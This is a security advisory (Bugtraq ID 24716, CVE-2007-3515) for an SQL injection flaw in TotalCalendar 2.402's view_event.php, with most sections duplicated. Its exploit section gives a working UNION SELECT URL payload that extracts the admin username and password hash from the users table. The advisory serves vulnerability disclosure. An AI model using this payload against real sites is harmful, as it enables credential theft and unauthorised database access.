TotalCalendar View_Event Script SQL Injection Vulnerability
BID:24716
Info
TotalCalendar View_Event Script SQL Injection Vulnerability
| Bugtraq ID: | 24716 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3515 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | t0pP8uZz and xprog are credited with the discovery of this vulnerability. |
| Vulnerable: |
SweetPHP TotalCalendar 2.402 |
| Not Vulnerable: | |
Discussion
TotalCalendar View_Event Script SQL Injection Vulnerability
TotalCalendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
TotalCalendar 2.402 is reported vulnerable; other versions may also be affected.
TotalCalendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
TotalCalendar 2.402 is reported vulnerable; other versions may also be affected.
Exploit / POC
TotalCalendar View_Event Script SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example was provided:
http://www.example.com/calender/path/view_event.php?id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pw),5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/tcal_users/**/WHERE/**/uid=1/*
Attackers can use a browser to exploit this issue.
The following example was provided:
http://www.example.com/calender/path/view_event.php?id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pw),5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/tcal_users/**/WHERE/**/uid=1/*
Solution / Fix
TotalCalendar View_Event Script SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
TotalCalendar View_Event Script SQL Injection Vulnerability
References:
References:
- TotalCalendar Homepage (SweetPHP)
- TotalCalendar 2.402 SQL Injection Vulnerability (milw0rm)